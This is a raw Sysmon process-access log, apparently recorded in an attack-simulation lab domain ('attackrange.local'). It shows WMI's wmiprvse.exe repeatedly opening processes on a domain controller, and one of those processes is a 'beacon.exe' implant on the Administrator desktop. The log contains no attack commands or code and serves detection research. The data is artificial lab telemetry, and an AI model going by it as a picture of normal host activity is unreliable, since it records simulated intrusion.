16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 